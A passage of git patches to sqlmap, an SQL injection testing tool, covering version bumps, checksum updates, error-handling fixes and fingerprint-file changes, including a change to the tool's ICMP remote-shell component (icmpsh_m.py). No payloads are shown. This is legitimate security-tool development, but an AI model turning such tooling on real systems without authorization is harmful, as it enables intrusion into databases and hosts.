insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2638150802b..28d4bab08c8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.3" +VERSION = "1.2.4.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c130916af1..de1d9bdbea8 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -578,7 +578,7 @@ class _(dict): page = page if isinstance(page, unicode) else getUnicode(page) code = ex.code - status = getUnicode(ex.msg) + status = getSafeExString(ex) kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code, status) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4989c8c656c..ed19de5c68d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -18951ad78a0c84df536edef011b2c0f0 lib/core/settings.py +e761fd544a135ac76c2ca15ec9bb874c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -acc31fac4efc25741c061bf8d7f8c3a2 lib/request/connect.py +86e8a444425006b9adba1d4e2cf66eca lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 4f2669a45aa5e12c77778794c6141d7171db710f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Apr 2018 01:13:04 +0200 Subject: [PATCH 105/428] Fixes #3030 --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 28d4bab08c8..00cd554186a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.4" +VERSION = "1.2.4.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index de1d9bdbea8..358fa22b416 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -495,7 +495,7 @@ class _(dict): responseHeaders = {} page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) if conn else None + status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None kb.connErrorCounter = 0 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ed19de5c68d..792df52406d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e761fd544a135ac76c2ca15ec9bb874c lib/core/settings.py +3cb22d21169fd140938c5ecdeb209b83 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -86e8a444425006b9adba1d4e2cf66eca lib/request/connect.py +18052b8924b77eb2e772350b262aae88 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 2c5f976993ca9e9db4a2ab5b9f5df47413a6dec5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 11:34:50 +0200 Subject: [PATCH 106/428] Fixes #3035 --- lib/core/settings.py | 2 +- plugins/dbms/mssqlserver/connector.py | 2 ++ plugins/dbms/sybase/connector.py | 2 ++ txt/checksum.md5 | 6 +++--- 4 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 00cd554186a..7e98bdd79b3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.5" +VERSION = "1.2.4.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index fe1cec52f85..36f69ef3227 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -43,6 +43,8 @@ def connect(self): self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) + except ValueError: + raise SqlmapConnectionException self.initCursor() self.printConnected() diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index fe1cec52f85..36f69ef3227 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -43,6 +43,8 @@ def connect(self): self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) + except ValueError: + raise SqlmapConnectionException self.initCursor() self.printConnected() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 792df52406d..2ba117da1da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3cb22d21169fd140938c5ecdeb209b83 lib/core/settings.py +6fd851fdbd1fd040f6212a6eff80bd0b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -159,7 +159,7 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py 51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py @@ -194,7 +194,7 @@ ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py -6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py 426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py From 4528cb014de24cacb1a2a6fbeff2f28ee09ae8ac Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 12:05:08 +0200 Subject: [PATCH 107/428] Minor just in case patch --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7e98bdd79b3..e8c807fa316 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.6" +VERSION = "1.2.4.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2ba117da1da..1a86dc30a1f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6fd851fdbd1fd040f6212a6eff80bd0b lib/core/settings.py +cc7aa83cd292f28d11782127d891256e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -470,4 +470,4 @@ b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -775ed5c7e1340f76f17f6186abbd8c92 xml/queries.xml +186808373a45316a45ad5f6ca8d90ff3 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 1610a19a8e1..cbd407d47da 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -14,7 +14,7 @@ - + From a9c3b59cffea761a735abdeca24388ef2251030f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 9 Apr 2018 12:14:46 +0200 Subject: [PATCH 108/428] Update related to the #2999 --- lib/core/option.py | 11 ++++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 6 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index f7f213c9815..23daf5761ad 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -918,7 +918,7 @@ def _setTamperingFunctions(): dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) - infoMsg = "loading tamper script '%s'" % filename[:-3] + infoMsg = "loading tamper module '%s'" % filename[:-3] logger.info(infoMsg) if not os.path.exists(os.path.join(dirname, "__init__.py")): @@ -932,7 +932,7 @@ def _setTamperingFunctions(): try: module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) except Exception, ex: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) + raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (filename[:-3], getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ @@ -962,7 +962,12 @@ def _setTamperingFunctions(): break elif name == "dependencies": - function() + try: + function() + except Exception, ex: + errMsg = "error occurred while checking dependencies " + errMsg += "for tamper module '%s' ('%s')" % (filename[:-3], getSafeExString(ex)) + raise SqlmapGenericException(errMsg) if not found: errMsg = "missing function 'tamper(payload, **kwargs)' " diff --git a/lib/core/settings.py b/lib/core/settings.py index e8c807fa316..5d345a6505e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.7" +VERSION = "1.2.4.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1a86dc30a1f..b0b6740f459 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b950c8c2f2ae87ad2ec99e1d19b2c03a lib/core/option.py +83345a6b0b7e187d2cbcc280a509f03e lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cc7aa83cd292f28d11782127d891256e lib/core/settings.py +f7a3dd2314df4d3bc09ae192558ff874 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From b5b32c951cc8ad6df8aa3cde274709b638e61465 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Apr 2018 11:03:08 +0200 Subject: [PATCH 109/428] Minor update --- lib/core/common.py | 19 +++++++++++-------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 11 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a4898e25508..2908bc26057 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3280,14 +3280,17 @@ def checkIntegrity(): logger.debug("running code integrity check") retVal = True - for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): - path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) - if not os.path.isfile(path): - logger.error("missing file detected '%s'" % path) - retVal = False - elif md5File(path) != checksum: - logger.error("wrong checksum of file '%s' detected" % path) - retVal = False + + if os.path.isfile(paths.CHECKSUM_MD5): + for checksum, _ in (re.split(r'\s+', _) for _ in getFileItems(paths.CHECKSUM_MD5)): + path = os.path.normpath(os.path.join(paths.SQLMAP_ROOT_PATH, _)) + if not os.path.isfile(path): + logger.error("missing file detected '%s'" % path) + retVal = False + elif md5File(path) != checksum: + logger.error("wrong checksum of file '%s' detected" % path) + retVal = False + return retVal def unhandledExceptionMessage(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 5d345a6505e..70b9fba452e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.8" +VERSION = "1.2.4.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b0b6740f459..3af4187b6eb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -58312f5c2f252145ec4aed01bc7952a0 lib/core/common.py +31cd0692a626da935b1cac8f2cfba25a lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f7a3dd2314df4d3bc09ae192558ff874 lib/core/settings.py +3ae3e12c5183d4468fbeb1cb6f4e231c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 44f6951dfeed4bd5a64e10550d836da308f7d4bc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Apr 2018 11:35:39 +0200 Subject: [PATCH 110/428] Update of xml/banner files --- lib/core/settings.py | 2 +- lib/parse/headers.py | 2 +- txt/checksum.md5 | 14 +++++----- xml/banner/generic.xml | 4 +++ xml/banner/mysql.xml | 16 +++++++++++ xml/banner/postgresql.xml | 9 ------- xml/banner/server.xml | 56 ++++++++++++++++++++++++++++++++++++--- xml/banner/set-cookie.xml | 2 +- 8 files changed, 83 insertions(+), 22 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 70b9fba452e..746705d3f4e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.9" +VERSION = "1.2.4.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 83cd7e89065..1b3c225f319 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -31,7 +31,7 @@ def headersParser(headers): "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): + for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers): value = headers[header] xmlfile = kb.headerPaths[header] handler = FingerprintHandler(value, kb.headersFp) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3af4187b6eb..abe940bc4f7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3ae3e12c5183d4468fbeb1cb6f4e231c lib/core/settings.py +416a9d32cc0b6ee6281e0ec062a4d169 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -60,7 +60,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py -8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py +aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py @@ -450,14 +450,14 @@ a687449cd4e45f69e33b13d41e021480 waf/uspses.py 68e332530fab216d017ede506c3fec2f waf/yundun.py bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py 705ac8663513c12150cb5623ef4a04fb waf/zenedge.py -e87d59af23b7b18cd56c9883e5f02d5c xml/banner/generic.xml +dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml -b8b56f4aa34bf65365808919b97119a7 xml/banner/mysql.xml +7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml 9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml -d90fe5a47b95dff3eb1797764c9db6c5 xml/banner/postgresql.xml -b07b5c47c751787e136650ded060197f xml/banner/server.xml +c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml +4970709ca31bcaea5eb79547a132606a xml/banner/server.xml d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -2d53fdaca0d7b42edad5192661248d76 xml/banner/set-cookie.xml +58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index eb97b1d8810..27e8bdd8629 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml @@ -27,6 +27,10 @@ + + + + diff --git a/xml/banner/mysql.xml b/xml/banner/mysql.xml index 5ac157302c4..b637ebb92e2 100644 --- a/xml/banner/mysql.xml +++ b/xml/banner/mysql.xml @@ -35,6 +35,22 @@ + + + + + + + + + + + + + + + + diff --git a/xml/banner/postgresql.xml b/xml/banner/postgresql.xml index 4c64844d790..7f03e8e8c4a 100644 --- a/xml/banner/postgresql.xml +++ b/xml/banner/postgresql.xml @@ -13,13 +13,4 @@ - - - - - - - - - diff --git a/xml/banner/server.xml b/xml/banner/server.xml index 48f0ab15888..737a13f143d 100644 --- a/xml/banner/server.xml +++ b/xml/banner/server.xml @@ -89,6 +89,10 @@ + + + + @@ -155,8 +159,8 @@ - - + + @@ -273,6 +277,22 @@ + + + + + + + + + + + + + + + + @@ -379,6 +399,14 @@ + + + + + + + + @@ -678,6 +706,14 @@ + + + + + + + + @@ -753,7 +789,15 @@ - + + + + + + + + + @@ -761,4 +805,10 @@ + + + + + + diff --git a/xml/banner/set-cookie.xml b/xml/banner/set-cookie.xml index c9e34d2ceaa..4e85296b8a6 100644 --- a/xml/banner/set-cookie.xml +++ b/xml/banner/set-cookie.xml @@ -11,7 +11,7 @@ - + From 8605c49911b23e91eec35324aa7d9208754460cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 13:06:47 +0200 Subject: [PATCH 111/428] Update related to the #3039 --- extra/icmpsh/icmpsh_m.py | 8 ++++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 5 deletions(-) diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 6e96952b3d6..23a60b865c4 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -125,8 +125,12 @@ def main(src, dst): # Have the IP packet contain the ICMP packet (along with its payload) ip.contains(icmp) - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) + try: + # Send it to the target host + sock.sendto(ip.get_packet(), (dst, 0)) + except socket.error, ex: + sys.stderr.write("'%s'\n" % ex) + sys.stderr.flush() if __name__ == '__main__': if len(sys.argv) < 3: diff --git a/lib/core/settings.py b/lib/core/settings.py index 746705d3f4e..0c0ba9441e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.10" +VERSION = "1.2.4.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index abe940bc4f7..b9f3373738d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -5,7 +5,7 @@ b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py 1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ -2176d964f2d5ba2d871383d6a1868b8f extra/icmpsh/icmpsh_m.py +fe39e5c315d63afff5cb99ec42fc883f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py 27629e01ba722271c990ad4b27151917 extra/mssqlsig/update.py @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -416a9d32cc0b6ee6281e0ec062a4d169 lib/core/settings.py +4130d34ca6a37e8944dfdf0b94643235 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From c634f0b0d6261aa900cae9d7d910e18abf19c9fd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Apr 2018 13:14:09 +0200 Subject: [PATCH 112/428] Patch related to the #3041 --- lib/core/settings.py | 2 +- sqlmap.py | 9 ++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c0ba9441e6..cc1ec7e1744 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.11" +VERSION = "1.2.4.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 0dbe6827a20..49dadc22817 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -265,11 +265,18 @@ def main(): raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): - errMsg = "please update the 'sqlalchemy' package" + errMsg = "please update the 'sqlalchemy' package " errMsg += "(Reference: https://github.com/apache/incubator-superset/issues/3447)" logger.error(errMsg) raise SystemExit + elif "must be pinned buffer, not bytearray" in excMsg: + errMsg = "error occurred at Python interpreter which " + errMsg += "is fixed in 2.7.x. Please update accordingly " + errMsg += "(Reference: https://bugs.python.org/issue8104)" + logger.error(errMsg) + raise SystemExit + elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. " errMsg += "Please make sure that you are not running too many processes" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b9f3373738d..cb3b7f41707 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py 